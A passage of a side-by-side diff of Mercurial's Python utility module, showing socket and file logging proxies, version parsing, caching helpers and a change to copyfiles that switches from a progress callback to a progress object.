719 719 def sendto(self, *args, **kwargs):
720 720 return object.__getattribute__(self, r'_observedcall')(
721 721 r'sendto', *args, **kwargs)
722 722
723 723 def setblocking(self, *args, **kwargs):
724 724 return object.__getattribute__(self, r'_observedcall')(
725 725 r'setblocking', *args, **kwargs)
726 726
727 727 def settimeout(self, *args, **kwargs):
728 728 return object.__getattribute__(self, r'_observedcall')(
729 729 r'settimeout', *args, **kwargs)
730 730
731 731 def gettimeout(self, *args, **kwargs):
732 732 return object.__getattribute__(self, r'_observedcall')(
733 733 r'gettimeout', *args, **kwargs)
734 734
735 735 def setsockopt(self, *args, **kwargs):
736 736 return object.__getattribute__(self, r'_observedcall')(
737 737 r'setsockopt', *args, **kwargs)
738 738
739 739 class baseproxyobserver(object):
740 740 def _writedata(self, data):
741 741 if not self.logdata:
742 742 if self.logdataapis:
743 743 self.fh.write('\n')
744 744 self.fh.flush()
745 745 return
746 746
747 747 # Simple case writes all data on a single line.
748 748 if b'\n' not in data:
749 749 if self.logdataapis:
750 750 self.fh.write(': %s\n' % stringutil.escapestr(data))
751 751 else:
752 752 self.fh.write('%s> %s\n'
753 753 % (self.name, stringutil.escapestr(data)))
754 754 self.fh.flush()
755 755 return
756 756
757 757 # Data with newlines is written to multiple lines.
758 758 if self.logdataapis:
759 759 self.fh.write(':\n')
760 760
761 761 lines = data.splitlines(True)
762 762 for line in lines:
763 763 self.fh.write('%s> %s\n'
764 764 % (self.name, stringutil.escapestr(line)))
765 765 self.fh.flush()
766 766
767 767 class fileobjectobserver(baseproxyobserver):
768 768 """Logs file object activity."""
769 769 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
770 770 logdataapis=True):
771 771 self.fh = fh
772 772 self.name = name
773 773 self.logdata = logdata
774 774 self.logdataapis = logdataapis
775 775 self.reads = reads
776 776 self.writes = writes
777 777
778 778 def read(self, res, size=-1):
779 779 if not self.reads:
780 780 return
781 781 # Python 3 can return None from reads at EOF instead of empty strings.
782 782 if res is None:
783 783 res = ''
784 784
785 785 if size == -1 and res == '':
786 786 # Suppress pointless read(-1) calls that return
787 787 # nothing. These happen _a lot_ on Python 3, and there
788 788 # doesn't seem to be a better workaround to have matching
789 789 # Python 2 and 3 behavior. :(
790 790 return
791 791
792 792 if self.logdataapis:
793 793 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
794 794
795 795 self._writedata(res)
796 796
797 797 def readline(self, res, limit=-1):
798 798 if not self.reads:
799 799 return
800 800
801 801 if self.logdataapis:
802 802 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
803 803
804 804 self._writedata(res)
805 805
806 806 def readinto(self, res, dest):
807 807 if not self.reads:
808 808 return
809 809
810 810 if self.logdataapis:
811 811 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
812 812 res))
813 813
814 814 data = dest[0:res] if res is not None else b''
815 815 self._writedata(data)
816 816
817 817 def write(self, res, data):
818 818 if not self.writes:
819 819 return
820 820
821 821 # Python 2 returns None from some write() calls. Python 3 (reasonably)
822 822 # returns the integer bytes written.
823 823 if res is None and data:
824 824 res = len(data)
825 825
826 826 if self.logdataapis:
827 827 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
828 828
829 829 self._writedata(data)
830 830
831 831 def flush(self, res):
832 832 if not self.writes:
833 833 return
834 834
835 835 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
836 836
837 837 # For observedbufferedinputpipe.
838 838 def bufferedread(self, res, size):
839 839 if not self.reads:
840 840 return
841 841
842 842 if self.logdataapis:
843 843 self.fh.write('%s> bufferedread(%d) -> %d' % (
844 844 self.name, size, len(res)))
845 845
846 846 self._writedata(res)
847 847
848 848 def bufferedreadline(self, res):
849 849 if not self.reads:
850 850 return
851 851
852 852 if self.logdataapis:
853 853 self.fh.write('%s> bufferedreadline() -> %d' % (
854 854 self.name, len(res)))
855 855
856 856 self._writedata(res)
857 857
858 858 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
859 859 logdata=False, logdataapis=True):
860 860 """Turn a file object into a logging file object."""
861 861
862 862 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
863 863 logdata=logdata, logdataapis=logdataapis)
864 864 return fileobjectproxy(fh, observer)
865 865
866 866 class socketobserver(baseproxyobserver):
867 867 """Logs socket activity."""
868 868 def __init__(self, fh, name, reads=True, writes=True, states=True,
869 869 logdata=False, logdataapis=True):
870 870 self.fh = fh
871 871 self.name = name
872 872 self.reads = reads
873 873 self.writes = writes
874 874 self.states = states
875 875 self.logdata = logdata
876 876 self.logdataapis = logdataapis
877 877
878 878 def makefile(self, res, mode=None, bufsize=None):
879 879 if not self.states:
880 880 return
881 881
882 882 self.fh.write('%s> makefile(%r, %r)\n' % (
883 883 self.name, mode, bufsize))
884 884
885 885 def recv(self, res, size, flags=0):
886 886 if not self.reads:
887 887 return
888 888
889 889 if self.logdataapis:
890 890 self.fh.write('%s> recv(%d, %d) -> %d' % (
891 891 self.name, size, flags, len(res)))
892 892 self._writedata(res)
893 893
894 894 def recvfrom(self, res, size, flags=0):
895 895 if not self.reads:
896 896 return
897 897
898 898 if self.logdataapis:
899 899 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
900 900 self.name, size, flags, len(res[0])))
901 901
902 902 self._writedata(res[0])
903 903
904 904 def recvfrom_into(self, res, buf, size, flags=0):
905 905 if not self.reads:
906 906 return
907 907
908 908 if self.logdataapis:
909 909 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
910 910 self.name, size, flags, res[0]))
911 911
912 912 self._writedata(buf[0:res[0]])
913 913
914 914 def recv_into(self, res, buf, size=0, flags=0):
915 915 if not self.reads:
916 916 return
917 917
918 918 if self.logdataapis:
919 919 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
920 920 self.name, size, flags, res))
921 921
922 922 self._writedata(buf[0:res])
923 923
924 924 def send(self, res, data, flags=0):
925 925 if not self.writes:
926 926 return
927 927
928 928 self.fh.write('%s> send(%d, %d) -> %d' % (
929 929 self.name, len(data), flags, len(res)))
930 930 self._writedata(data)
931 931
932 932 def sendall(self, res, data, flags=0):
933 933 if not self.writes:
934 934 return
935 935
936 936 if self.logdataapis:
937 937 # Returns None on success. So don't bother reporting return value.
938 938 self.fh.write('%s> sendall(%d, %d)' % (
939 939 self.name, len(data), flags))
940 940
941 941 self._writedata(data)
942 942
943 943 def sendto(self, res, data, flagsoraddress, address=None):
944 944 if not self.writes:
945 945 return
946 946
947 947 if address:
948 948 flags = flagsoraddress
949 949 else:
950 950 flags = 0
951 951
952 952 if self.logdataapis:
953 953 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
954 954 self.name, len(data), flags, address, res))
955 955
956 956 self._writedata(data)
957 957
958 958 def setblocking(self, res, flag):
959 959 if not self.states:
960 960 return
961 961
962 962 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
963 963
964 964 def settimeout(self, res, value):
965 965 if not self.states:
966 966 return
967 967
968 968 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
969 969
970 970 def gettimeout(self, res):
971 971 if not self.states:
972 972 return
973 973
974 974 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
975 975
976 976 def setsockopt(self, level, optname, value):
977 977 if not self.states:
978 978 return
979 979
980 980 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
981 981 self.name, level, optname, value))
982 982
983 983 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
984 984 logdata=False, logdataapis=True):
985 985 """Turn a socket into a logging socket."""
986 986
987 987 observer = socketobserver(logh, name, reads=reads, writes=writes,
988 988 states=states, logdata=logdata,
989 989 logdataapis=logdataapis)
990 990 return socketproxy(fh, observer)
991 991
992 992 def version():
993 993 """Return version information if available."""
994 994 try:
995 995 from . import __version__
996 996 return __version__.version
997 997 except ImportError:
998 998 return 'unknown'
999 999
1000 1000 def versiontuple(v=None, n=4):
1001 1001 """Parses a Mercurial version string into an N-tuple.
1002 1002
1003 1003 The version string to be parsed is specified with the ``v`` argument.
1004 1004 If it isn't defined, the current Mercurial version string will be parsed.
1005 1005
1006 1006 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1007 1007 returned values:
1008 1008
1009 1009 >>> v = b'3.6.1+190-df9b73d2d444'
1010 1010 >>> versiontuple(v, 2)
1011 1011 (3, 6)
1012 1012 >>> versiontuple(v, 3)
1013 1013 (3, 6, 1)
1014 1014 >>> versiontuple(v, 4)
1015 1015 (3, 6, 1, '190-df9b73d2d444')
1016 1016
1017 1017 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1018 1018 (3, 6, 1, '190-df9b73d2d444+20151118')
1019 1019
1020 1020 >>> v = b'3.6'
1021 1021 >>> versiontuple(v, 2)
1022 1022 (3, 6)
1023 1023 >>> versiontuple(v, 3)
1024 1024 (3, 6, None)
1025 1025 >>> versiontuple(v, 4)
1026 1026 (3, 6, None, None)
1027 1027
1028 1028 >>> v = b'3.9-rc'
1029 1029 >>> versiontuple(v, 2)
1030 1030 (3, 9)
1031 1031 >>> versiontuple(v, 3)
1032 1032 (3, 9, None)
1033 1033 >>> versiontuple(v, 4)
1034 1034 (3, 9, None, 'rc')
1035 1035
1036 1036 >>> v = b'3.9-rc+2-02a8fea4289b'
1037 1037 >>> versiontuple(v, 2)
1038 1038 (3, 9)
1039 1039 >>> versiontuple(v, 3)
1040 1040 (3, 9, None)
1041 1041 >>> versiontuple(v, 4)
1042 1042 (3, 9, None, 'rc+2-02a8fea4289b')
1043 1043
1044 1044 >>> versiontuple(b'4.6rc0')
1045 1045 (4, 6, None, 'rc0')
1046 1046 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1047 1047 (4, 6, None, 'rc0+12-425d55e54f98')
1048 1048 >>> versiontuple(b'.1.2.3')
1049 1049 (None, None, None, '.1.2.3')
1050 1050 >>> versiontuple(b'12.34..5')
1051 1051 (12, 34, None, '..5')
1052 1052 >>> versiontuple(b'1.2.3.4.5.6')
1053 1053 (1, 2, 3, '.4.5.6')
1054 1054 """
1055 1055 if not v:
1056 1056 v = version()
1057 1057 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1058 1058 if not m:
1059 1059 vparts, extra = '', v
1060 1060 elif m.group(2):
1061 1061 vparts, extra = m.groups()
1062 1062 else:
1063 1063 vparts, extra = m.group(1), None
1064 1064
1065 1065 vints = []
1066 1066 for i in vparts.split('.'):
1067 1067 try:
1068 1068 vints.append(int(i))
1069 1069 except ValueError:
1070 1070 break
1071 1071 # (3, 6) -> (3, 6, None)
1072 1072 while len(vints) < 3:
1073 1073 vints.append(None)
1074 1074
1075 1075 if n == 2:
1076 1076 return (vints[0], vints[1])
1077 1077 if n == 3:
1078 1078 return (vints[0], vints[1], vints[2])
1079 1079 if n == 4:
1080 1080 return (vints[0], vints[1], vints[2], extra)
1081 1081
1082 1082 def cachefunc(func):
1083 1083 '''cache the result of function calls'''
1084 1084 # XXX doesn't handle keywords args
1085 1085 if func.__code__.co_argcount == 0:
1086 1086 cache = []
1087 1087 def f():
1088 1088 if len(cache) == 0:
1089 1089 cache.append(func())
1090 1090 return cache[0]
1091 1091 return f
1092 1092 cache = {}
1093 1093 if func.__code__.co_argcount == 1:
1094 1094 # we gain a small amount of time because
1095 1095 # we don't need to pack/unpack the list
1096 1096 def f(arg):
1097 1097 if arg not in cache:
1098 1098 cache[arg] = func(arg)
1099 1099 return cache[arg]
1100 1100 else:
1101 1101 def f(*args):
1102 1102 if args not in cache:
1103 1103 cache[args] = func(*args)
1104 1104 return cache[args]
1105 1105
1106 1106 return f
1107 1107
1108 1108 class cow(object):
1109 1109 """helper class to make copy-on-write easier
1110 1110
1111 1111 Call preparewrite before doing any writes.
1112 1112 """
1113 1113
1114 1114 def preparewrite(self):
1115 1115 """call this before writes, return self or a copied new object"""
1116 1116 if getattr(self, '_copied', 0):
1117 1117 self._copied -= 1
1118 1118 return self.__class__(self)
1119 1119 return self
1120 1120
1121 1121 def copy(self):
1122 1122 """always do a cheap copy"""
1123 1123 self._copied = getattr(self, '_copied', 0) + 1
1124 1124 return self
1125 1125
1126 1126 class sortdict(collections.OrderedDict):
1127 1127 '''a simple sorted dictionary
1128 1128
1129 1129 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1130 1130 >>> d2 = d1.copy()
1131 1131 >>> d2
1132 1132 sortdict([('a', 0), ('b', 1)])
1133 1133 >>> d2.update([(b'a', 2)])
1134 1134 >>> list(d2.keys()) # should still be in last-set order
1135 1135 ['b', 'a']
1136 1136 '''
1137 1137
1138 1138 def __setitem__(self, key, value):
1139 1139 if key in self:
1140 1140 del self[key]
1141 1141 super(sortdict, self).__setitem__(key, value)
1142 1142
1143 1143 if pycompat.ispypy:
1144 1144 # __setitem__() isn't called as of PyPy 5.8.0
1145 1145 def update(self, src):
1146 1146 if isinstance(src, dict):
1147 1147 src = src.iteritems()
1148 1148 for k, v in src:
1149 1149 self[k] = v
1150 1150
1151 1151 class cowdict(cow, dict):
1152 1152 """copy-on-write dict
1153 1153
1154 1154 Be sure to call d = d.preparewrite() before writing to d.
1155 1155
1156 1156 >>> a = cowdict()
1157 1157 >>> a is a.preparewrite()
1158 1158 True
1159 1159 >>> b = a.copy()
1160 1160 >>> b is a
1161 1161 True
1162 1162 >>> c = b.copy()
1163 1163 >>> c is a
1164 1164 True
1165 1165 >>> a = a.preparewrite()
1166 1166 >>> b is a
1167 1167 False
1168 1168 >>> a is a.preparewrite()
1169 1169 True
1170 1170 >>> c = c.preparewrite()
1171 1171 >>> b is c
1172 1172 False
1173 1173 >>> b is b.preparewrite()
1174 1174 True
1175 1175 """
1176 1176
1177 1177 class cowsortdict(cow, sortdict):
1178 1178 """copy-on-write sortdict
1179 1179
1180 1180 Be sure to call d = d.preparewrite() before writing to d.
1181 1181 """
1182 1182
1183 1183 class transactional(object):
1184 1184 """Base class for making a transactional type into a context manager."""
1185 1185 __metaclass__ = abc.ABCMeta
1186 1186
1187 1187 @abc.abstractmethod
1188 1188 def close(self):
1189 1189 """Successfully closes the transaction."""
1190 1190
1191 1191 @abc.abstractmethod
1192 1192 def release(self):
1193 1193 """Marks the end of the transaction.
1194 1194
1195 1195 If the transaction has not been closed, it will be aborted.
1196 1196 """
1197 1197
1198 1198 def __enter__(self):
1199 1199 return self
1200 1200
1201 1201 def __exit__(self, exc_type, exc_val, exc_tb):
1202 1202 try:
1203 1203 if exc_type is None:
1204 1204 self.close()
1205 1205 finally:
1206 1206 self.release()
1207 1207
1208 1208 @contextlib.contextmanager
1209 1209 def acceptintervention(tr=None):
1210 1210 """A context manager that closes the transaction on InterventionRequired
1211 1211
1212 1212 If no transaction was provided, this simply runs the body and returns
1213 1213 """
1214 1214 if not tr:
1215 1215 yield
1216 1216 return
1217 1217 try:
1218 1218 yield
1219 1219 tr.close()
1220 1220 except error.InterventionRequired:
1221 1221 tr.close()
1222 1222 raise
1223 1223 finally:
1224 1224 tr.release()
1225 1225
1226 1226 @contextlib.contextmanager
1227 1227 def nullcontextmanager():
1228 1228 yield
1229 1229
1230 1230 class _lrucachenode(object):
1231 1231 """A node in a doubly linked list.
1232 1232
1233 1233 Holds a reference to nodes on either side as well as a key-value
1234 1234 pair for the dictionary entry.
1235 1235 """
1236 1236 __slots__ = (u'next', u'prev', u'key', u'value')
1237 1237
1238 1238 def __init__(self):
1239 1239 self.next = None
1240 1240 self.prev = None
1241 1241
1242 1242 self.key = _notset
1243 1243 self.value = None
1244 1244
1245 1245 def markempty(self):
1246 1246 """Mark the node as emptied."""
1247 1247 self.key = _notset
1248 1248
1249 1249 class lrucachedict(object):
1250 1250 """Dict that caches most recent accesses and sets.
1251 1251
1252 1252 The dict consists of an actual backing dict - indexed by original
1253 1253 key - and a doubly linked circular list defining the order of entries in
1254 1254 the cache.
1255 1255
1256 1256 The head node is the newest entry in the cache. If the cache is full,
1257 1257 we recycle head.prev and make it the new head. Cache accesses result in
1258 1258 the node being moved to before the existing head and being marked as the
1259 1259 new head node.
1260 1260 """
1261 1261 def __init__(self, max):
1262 1262 self._cache = {}
1263 1263
1264 1264 self._head = head = _lrucachenode()
1265 1265 head.prev = head
1266 1266 head.next = head
1267 1267 self._size = 1
1268 1268 self._capacity = max
1269 1269
1270 1270 def __len__(self):
1271 1271 return len(self._cache)
1272 1272
1273 1273 def __contains__(self, k):
1274 1274 return k in self._cache
1275 1275
1276 1276 def __iter__(self):
1277 1277 # We don't have to iterate in cache order, but why not.
1278 1278 n = self._head
1279 1279 for i in range(len(self._cache)):
1280 1280 yield n.key
1281 1281 n = n.next
1282 1282
1283 1283 def __getitem__(self, k):
1284 1284 node = self._cache[k]
1285 1285 self._movetohead(node)
1286 1286 return node.value
1287 1287
1288 1288 def __setitem__(self, k, v):
1289 1289 node = self._cache.get(k)
1290 1290 # Replace existing value and mark as newest.
1291 1291 if node is not None:
1292 1292 node.value = v
1293 1293 self._movetohead(node)
1294 1294 return
1295 1295
1296 1296 if self._size < self._capacity:
1297 1297 node = self._addcapacity()
1298 1298 else:
1299 1299 # Grab the last/oldest item.
1300 1300 node = self._head.prev
1301 1301
1302 1302 # At capacity. Kill the old entry.
1303 1303 if node.key is not _notset:
1304 1304 del self._cache[node.key]
1305 1305
1306 1306 node.key = k
1307 1307 node.value = v
1308 1308 self._cache[k] = node
1309 1309 # And mark it as newest entry. No need to adjust order since it
1310 1310 # is already self._head.prev.
1311 1311 self._head = node
1312 1312
1313 1313 def __delitem__(self, k):
1314 1314 node = self._cache.pop(k)
1315 1315 node.markempty()
1316 1316
1317 1317 # Temporarily mark as newest item before re-adjusting head to make
1318 1318 # this node the oldest item.
1319 1319 self._movetohead(node)
1320 1320 self._head = node.next
1321 1321
1322 1322 # Additional dict methods.
1323 1323
1324 1324 def get(self, k, default=None):
1325 1325 try:
1326 1326 return self._cache[k].value
1327 1327 except KeyError:
1328 1328 return default
1329 1329
1330 1330 def clear(self):
1331 1331 n = self._head
1332 1332 while n.key is not _notset:
1333 1333 n.markempty()
1334 1334 n = n.next
1335 1335
1336 1336 self._cache.clear()
1337 1337
1338 1338 def copy(self):
1339 1339 result = lrucachedict(self._capacity)
1340 1340 n = self._head.prev
1341 1341 # Iterate in oldest-to-newest order, so the copy has the right ordering
1342 1342 for i in range(len(self._cache)):
1343 1343 result[n.key] = n.value
1344 1344 n = n.prev
1345 1345 return result
1346 1346
1347 1347 def _movetohead(self, node):
1348 1348 """Mark a node as the newest, making it the new head.
1349 1349
1350 1350 When a node is accessed, it becomes the freshest entry in the LRU
1351 1351 list, which is denoted by self._head.
1352 1352
1353 1353 Visually, let's make ``N`` the new head node (* denotes head):
1354 1354
1355 1355 previous/oldest <-> head <-> next/next newest
1356 1356
1357 1357 ----<->--- A* ---<->-----
1358 1358 | |
1359 1359 E <-> D <-> N <-> C <-> B
1360 1360
1361 1361 To:
1362 1362
1363 1363 ----<->--- N* ---<->-----
1364 1364 | |
1365 1365 E <-> D <-> C <-> B <-> A
1366 1366
1367 1367 This requires the following moves:
1368 1368
1369 1369 C.next = D (node.prev.next = node.next)
1370 1370 D.prev = C (node.next.prev = node.prev)
1371 1371 E.next = N (head.prev.next = node)
1372 1372 N.prev = E (node.prev = head.prev)
1373 1373 N.next = A (node.next = head)
1374 1374 A.prev = N (head.prev = node)
1375 1375 """
1376 1376 head = self._head
1377 1377 # C.next = D
1378 1378 node.prev.next = node.next
1379 1379 # D.prev = C
1380 1380 node.next.prev = node.prev
1381 1381 # N.prev = E
1382 1382 node.prev = head.prev
1383 1383 # N.next = A
1384 1384 # It is tempting to do just "head" here, however if node is
1385 1385 # adjacent to head, this will do bad things.
1386 1386 node.next = head.prev.next
1387 1387 # E.next = N
1388 1388 node.next.prev = node
1389 1389 # A.prev = N
1390 1390 node.prev.next = node
1391 1391
1392 1392 self._head = node
1393 1393
1394 1394 def _addcapacity(self):
1395 1395 """Add a node to the circular linked list.
1396 1396
1397 1397 The new node is inserted before the head node.
1398 1398 """
1399 1399 head = self._head
1400 1400 node = _lrucachenode()
1401 1401 head.prev.next = node
1402 1402 node.prev = head.prev
1403 1403 node.next = head
1404 1404 head.prev = node
1405 1405 self._size += 1
1406 1406 return node
1407 1407
1408 1408 def lrucachefunc(func):
1409 1409 '''cache most recent results of function calls'''
1410 1410 cache = {}
1411 1411 order = collections.deque()
1412 1412 if func.__code__.co_argcount == 1:
1413 1413 def f(arg):
1414 1414 if arg not in cache:
1415 1415 if len(cache) > 20:
1416 1416 del cache[order.popleft()]
1417 1417 cache[arg] = func(arg)
1418 1418 else:
1419 1419 order.remove(arg)
1420 1420 order.append(arg)
1421 1421 return cache[arg]
1422 1422 else:
1423 1423 def f(*args):
1424 1424 if args not in cache:
1425 1425 if len(cache) > 20:
1426 1426 del cache[order.popleft()]
1427 1427 cache[args] = func(*args)
1428 1428 else:
1429 1429 order.remove(args)
1430 1430 order.append(args)
1431 1431 return cache[args]
1432 1432
1433 1433 return f
1434 1434
1435 1435 class propertycache(object):
1436 1436 def __init__(self, func):
1437 1437 self.func = func
1438 1438 self.name = func.__name__
1439 1439 def __get__(self, obj, type=None):
1440 1440 result = self.func(obj)
1441 1441 self.cachevalue(obj, result)
1442 1442 return result
1443 1443
1444 1444 def cachevalue(self, obj, value):
1445 1445 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1446 1446 obj.__dict__[self.name] = value
1447 1447
1448 1448 def clearcachedproperty(obj, prop):
1449 1449 '''clear a cached property value, if one has been set'''
1450 1450 if prop in obj.__dict__:
1451 1451 del obj.__dict__[prop]
1452 1452
1453 1453 def increasingchunks(source, min=1024, max=65536):
1454 1454 '''return no less than min bytes per chunk while data remains,
1455 1455 doubling min after each chunk until it reaches max'''
1456 1456 def log2(x):
1457 1457 if not x:
1458 1458 return 0
1459 1459 i = 0
1460 1460 while x:
1461 1461 x >>= 1
1462 1462 i += 1
1463 1463 return i - 1
1464 1464
1465 1465 buf = []
1466 1466 blen = 0
1467 1467 for chunk in source:
1468 1468 buf.append(chunk)
1469 1469 blen += len(chunk)
1470 1470 if blen >= min:
1471 1471 if min < max:
1472 1472 min = min << 1
1473 1473 nmin = 1 << log2(blen)
1474 1474 if nmin > min:
1475 1475 min = nmin
1476 1476 if min > max:
1477 1477 min = max
1478 1478 yield ''.join(buf)
1479 1479 blen = 0
1480 1480 buf = []
1481 1481 if buf:
1482 1482 yield ''.join(buf)
1483 1483
1484 1484 def always(fn):
1485 1485 return True
1486 1486
1487 1487 def never(fn):
1488 1488 return False
1489 1489
1490 1490 def nogc(func):
1491 1491 """disable garbage collector
1492 1492
1493 1493 Python's garbage collector triggers a GC each time a certain number of
1494 1494 container objects (the number being defined by gc.get_threshold()) are
1495 1495 allocated even when marked not to be tracked by the collector. Tracking has
1496 1496 no effect on when GCs are triggered, only on what objects the GC looks
1497 1497 into. As a workaround, disable GC while building complex (huge)
1498 1498 containers.
1499 1499
1500 1500 This garbage collector issue have been fixed in 2.7. But it still affect
1501 1501 CPython's performance.
1502 1502 """
1503 1503 def wrapper(*args, **kwargs):
1504 1504 gcenabled = gc.isenabled()
1505 1505 gc.disable()
1506 1506 try:
1507 1507 return func(*args, **kwargs)
1508 1508 finally:
1509 1509 if gcenabled:
1510 1510 gc.enable()
1511 1511 return wrapper
1512 1512
1513 1513 if pycompat.ispypy:
1514 1514 # PyPy runs slower with gc disabled
1515 1515 nogc = lambda x: x
1516 1516
1517 1517 def pathto(root, n1, n2):
1518 1518 '''return the relative path from one place to another.
1519 1519 root should use os.sep to separate directories
1520 1520 n1 should use os.sep to separate directories
1521 1521 n2 should use "/" to separate directories
1522 1522 returns an os.sep-separated path.
1523 1523
1524 1524 If n1 is a relative path, it's assumed it's
1525 1525 relative to root.
1526 1526 n2 should always be relative to root.
1527 1527 '''
1528 1528 if not n1:
1529 1529 return localpath(n2)
1530 1530 if os.path.isabs(n1):
1531 1531 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1532 1532 return os.path.join(root, localpath(n2))
1533 1533 n2 = '/'.join((pconvert(root), n2))
1534 1534 a, b = splitpath(n1), n2.split('/')
1535 1535 a.reverse()
1536 1536 b.reverse()
1537 1537 while a and b and a[-1] == b[-1]:
1538 1538 a.pop()
1539 1539 b.pop()
1540 1540 b.reverse()
1541 1541 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1542 1542
1543 1543 # the location of data files matching the source code
1544 1544 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1545 1545 # executable version (py2exe) doesn't support __file__
1546 1546 datapath = os.path.dirname(pycompat.sysexecutable)
1547 1547 else:
1548 1548 datapath = os.path.dirname(pycompat.fsencode(__file__))
1549 1549
1550 1550 i18n.setdatapath(datapath)
1551 1551
1552 1552 def checksignature(func):
1553 1553 '''wrap a function with code to check for calling errors'''
1554 1554 def check(*args, **kwargs):
1555 1555 try:
1556 1556 return func(*args, **kwargs)
1557 1557 except TypeError:
1558 1558 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1559 1559 raise error.SignatureError
1560 1560 raise
1561 1561
1562 1562 return check
1563 1563
1564 1564 # a whilelist of known filesystems where hardlink works reliably
1565 1565 _hardlinkfswhitelist = {
1566 1566 'apfs',
1567 1567 'btrfs',
1568 1568 'ext2',
1569 1569 'ext3',
1570 1570 'ext4',
1571 1571 'hfs',
1572 1572 'jfs',
1573 1573 'NTFS',
1574 1574 'reiserfs',
1575 1575 'tmpfs',
1576 1576 'ufs',
1577 1577 'xfs',
1578 1578 'zfs',
1579 1579 }
1580 1580
1581 1581 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1582 1582 '''copy a file, preserving mode and optionally other stat info like
1583 1583 atime/mtime
1584 1584
1585 1585 checkambig argument is used with filestat, and is useful only if
1586 1586 destination file is guarded by any lock (e.g. repo.lock or
1587 1587 repo.wlock).
1588 1588
1589 1589 copystat and checkambig should be exclusive.
1590 1590 '''
1591 1591 assert not (copystat and checkambig)
1592 1592 oldstat = None
1593 1593 if os.path.lexists(dest):
1594 1594 if checkambig:
1595 1595 oldstat = checkambig and filestat.frompath(dest)
1596 1596 unlink(dest)
1597 1597 if hardlink:
1598 1598 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1599 1599 # unless we are confident that dest is on a whitelisted filesystem.
1600 1600 try:
1601 1601 fstype = getfstype(os.path.dirname(dest))
1602 1602 except OSError:
1603 1603 fstype = None
1604 1604 if fstype not in _hardlinkfswhitelist:
1605 1605 hardlink = False
1606 1606 if hardlink:
1607 1607 try:
1608 1608 oslink(src, dest)
1609 1609 return
1610 1610 except (IOError, OSError):
1611 1611 pass # fall back to normal copy
1612 1612 if os.path.islink(src):
1613 1613 os.symlink(os.readlink(src), dest)
1614 1614 # copytime is ignored for symlinks, but in general copytime isn't needed
1615 1615 # for them anyway
1616 1616 else:
1617 1617 try:
1618 1618 shutil.copyfile(src, dest)
1619 1619 if copystat:
1620 1620 # copystat also copies mode
1621 1621 shutil.copystat(src, dest)
1622 1622 else:
1623 1623 shutil.copymode(src, dest)
1624 1624 if oldstat and oldstat.stat:
1625 1625 newstat = filestat.frompath(dest)
1626 1626 if newstat.isambig(oldstat):
1627 1627 # stat of copied file is ambiguous to original one
1628 1628 advanced = (
1629 1629 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1630 1630 os.utime(dest, (advanced, advanced))
1631 1631 except shutil.Error as inst:
1632 1632 raise error.Abort(str(inst))
1633 1633
1634 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1634 def copyfiles(src, dst, hardlink=None, progress=None):
1635 1635 """Copy a directory tree using hardlinks if possible."""
1636 1636 num = 0
1637 1637
1638 gettopic = lambda: hardlink and _('linking') or _('copying')
1638 def settopic():
1639 if progress:
1640 progress.topic = _('linking') if hardlink else _('copying')
1639 1641
1640 1642 if os.path.isdir(src):
1641 1643 if hardlink is None:
1642 1644 hardlink = (os.stat(src).st_dev ==
1643 1645 os.stat(os.path.dirname(dst)).st_dev)
1644 topic = gettopic()
1646 settopic()
1645 1647 os.mkdir(dst)
1646 1648 for name, kind in listdir(src):
1647 1649 srcname = os.path.join(src, name)
1648 1650 dstname = os.path.join(dst, name)
1649 def nprog(t, pos):
1650 if pos is not None:
1651 return progress(t, pos + num)
1652 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1651 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1653 1652 num += n
1654 1653 else:
1655 1654 if hardlink is None:
1656 1655 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1657 1656 os.stat(os.path.dirname(dst)).st_dev)
1658 topic = gettopic()
1657 settopic()
1659 1658
1660 1659 if hardlink:
1661 1660 try:
1662 1661 oslink(src, dst)
1663 1662 except (IOError, OSError):
1664 1663 hardlink = False
1665 1664 shutil.copy(src, dst)
1666 1665 else:
1667 1666 shutil.copy(src, dst)
1668 1667 num += 1
1669 progress(topic, num)
1670 progress(topic, None)
1668 if progress:
1669 progress.increment()
1671 1670
1672 1671 return hardlink, num
1673 1672
1674 1673 _winreservednames = {
1675 1674 'con', 'prn', 'aux', 'nul',
1676 1675 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1677 1676 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1678 1677 }
1679 1678 _winreservedchars = ':*?"<>|'
1680 1679 def checkwinfilename(path):
1681 1680 r'''Check that the base-relative path is a valid filename on Windows.
1682 1681 Returns None if the path is ok, or a UI string describing the problem.
1683 1682
1684 1683 >>> checkwinfilename(b"just/a/normal/path")
1685 1684 >>> checkwinfilename(b"foo/bar/con.xml")
